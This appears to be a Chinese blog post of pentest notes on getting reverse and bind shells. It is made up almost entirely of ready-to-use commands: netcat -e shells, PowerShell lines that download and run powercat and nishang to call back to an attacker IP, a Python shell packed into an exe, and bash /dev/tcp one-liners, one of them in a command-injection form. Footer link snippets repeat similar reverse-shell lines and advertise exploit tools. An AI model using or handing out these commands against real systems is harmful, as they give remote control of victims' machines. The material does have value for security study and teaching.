反弹shell

已于 2023-11-29 11:33:39 修改
阅读量105 收藏
点赞数
文章标签: bash linux 开发语言
于 2023-04-27 22:29:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63527808/article/details/130416475
版权

一、正向连接

(攻击机主动连接被攻击机,通常用于被攻击机有公网IP可以直接访问的情况)

1、linux(攻击者)主动连接 windows(受害者)
// 绑定 cmd 到本地 6999 端口
windows:nc -e cmd -lvp 6999
// 主动连接目标 6999 端口
linux:nc 目标主机ip 6999

注意:有时候会出现乱码,此时使用:

chcp 65001  // utf-8 编码
2、windows(攻击者)主动连接 linux(受害者)
// 绑定 /bin/bash 到 6999 端口
linux:nc -e /bin/bash -lvp 6999
// 主动连接目标 6999 端口
windows:nc 目标主机ip 6999

注意:有些版本的 linux 的 nc 为了安全会不带有 -e 参数(比如 ubuntu)

二、反向连接

(被攻击机主动连接攻击机,通常用于被攻击机处于内网且出网的情况)

1、linux(受害者)主动连接 windows(攻击者)
// 监听 6999 端口,等待连接
nc -lvp 6999
// 绑定 /bin/bash 到对方主机 6999 端口
nc -e /bin/bash 目标主机ip地址 6999
2、linux 控制 windows
// 监听 6999 端口,等待连接
nc -lvp 6999
// 绑定 cmd 到对方主机 6999 端口
nc -e cmd 目标主机ip地址 6999

注意:nc -lvp 6666 若报错 :nc: getnameinfo: Temporary failure in name resolution

改为 nc -lvnp 6666

-n 选项用于指定不执行主机名解析,将目标IP地址显示为IP地址而不是主机名

三、更多反弹 shell 的操作

3.1  powershell 反弹 shell

1、使用 python 开启服务器

sudo python -m http.server 7788

2、使用 nc 开启监听端口

nc -lvp 5566

3、上传工具并执行命令,反向连接攻击者主机

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.103.130:7788/powercat.ps1');powercat -c 192.168.103.130 -p 5566 -e cmd
3.2  nishang反弹shell

1、使用 python 开启服务器

sudo python -m http.server 7788

2、 使用 nc 开启监听端口

nc -lvp 5566

 3、上传工具并执行命令,反向连接攻击者主机

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.103.130:7788/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.103.130 -port 5566

4、对于 udp

nc -lvup 53

5、使用 python 开启服务器

sudo python -m http.server 7788

 6、上传工具并执行命令,反向连接攻击者主机

powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.103.130:7788/nishang/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.103.130 -port 53
3.3  python 反弹 shell

1、判断是否能执行 python 脚本

2、nc 开启监听

nc -lvnp 5566

3、若是直接运行 .py 文件

python pycat.py --host 192.168.0.195 --port 5566

4、把 .py 文件打包为 .exe 文件就可以直接执行了

(1)先安装 pyinstaller
(2)pip install pyinstaller
(3)pyinstaller -Fw pycat.py

5、远程下载并执行:

powershell IEX (New-Object Net.WebClient).DownloadFile('http://192.168.103.130:7788/pycat.exe', 'C:\ProgramData\pycat.exe'); Start-Process 'C:\ProgramData\pycat.exe' --host 192.168.103.130 --port 5566

我没有成功,只下载了文件,但是没有执行。

补充:不使用 nc 的情况:

1、bash -i >& /dev/tcp/192.168.103.130/5566 0>&1

使用多条语句的时候:

ping 127.0.0.1 | /bin/bash -c 'bash -i >& /dev/tcp/192.168.103.130/5566 0>&1'

YUkawa539
关注
nc: getnameinfo: Temporary failure in name resolution
技术超强的网络安全平台
12-13 3211
问题:阿里云服务器 使用 nc -lvvp 7777 监听端口 报错:nc: getnameinfo: Temporary failure in name resolution 解决 加个参数n nc -lvnp 7777 ...
各种反弹shell方式
m0_58606546的博客
11-17 2312
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell汇总(超详细)
qq_52173020的博客
05-27 9154
反弹shell姿势大全,看这一篇就够啦~
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和...反弹shell脚本:python Spel_RCE_Bash_EXP.py url lhost lport 受影响版本:3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
Apache-flink 未授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 未授权访问任意jar包上传反弹shell
XXL-JOB反弹shell利用工具(xxl-jobExploitGUI)
11-03
工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。(由于传播、利用此资源所提供的信息或者工具而造成的任何直接或者间接的后果及损失,...
php反弹shell实现代码
10-30
作者想要简化操作流程,因此选择实现了一个反弹Shell到本地监听端口的功能。文档中还提到该代码是在phpspy2008的基础上进行修改,使其成为一个独立的PHP文件,并且上传到服务器上之后,通过设置好反弹的IP和端口来...
什么是反弹shell
qq_30503389的博客
06-06 1761
反弹Shell(Reverse Shell)是一种网络攻击技术,用于通过远程主机上的Shell(命令行终端)与攻击者建立连接,从而控制受攻击主机。攻击者通常在受攻击主机上以各种方式植入恶意代码(如后门程序),然后通过网络与该主机上运行的Shell建立反向连接,从而获得对该主机的完全控制权。反弹Shell技术通常是针对目标主机的防火墙和安全措施进行攻击。攻击者首先在目标主机上放置一个能够向外发起TCP或UDP连接的恶意程序,并将其设定为在特定条件下自动启动。
反弹shell原理与检测思路
最新发布
weixin_45690589的博客
02-26 673
反弹shell的本质可以定义为:一个client上的bash进程 可以和 server上的进程通信。本质上就是检测 shell进程(如bash)的输入输出是否来自于一个远程的server。由于进程通信的复杂性(例如pipe),会导致单纯的检测shell进程的0 1 2 是否来自socket会存在漏报。但是按照这个思路,检测shell进程的0 1 2 的来源,顺着来源继续跟踪,如果最终是来自一个socket。那么则存在反弹shell的风险。
反弹shell的N种姿势
cainsoftware的博客
10-09 266
0x00 前言 在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。 0x01 Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i 打开一
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值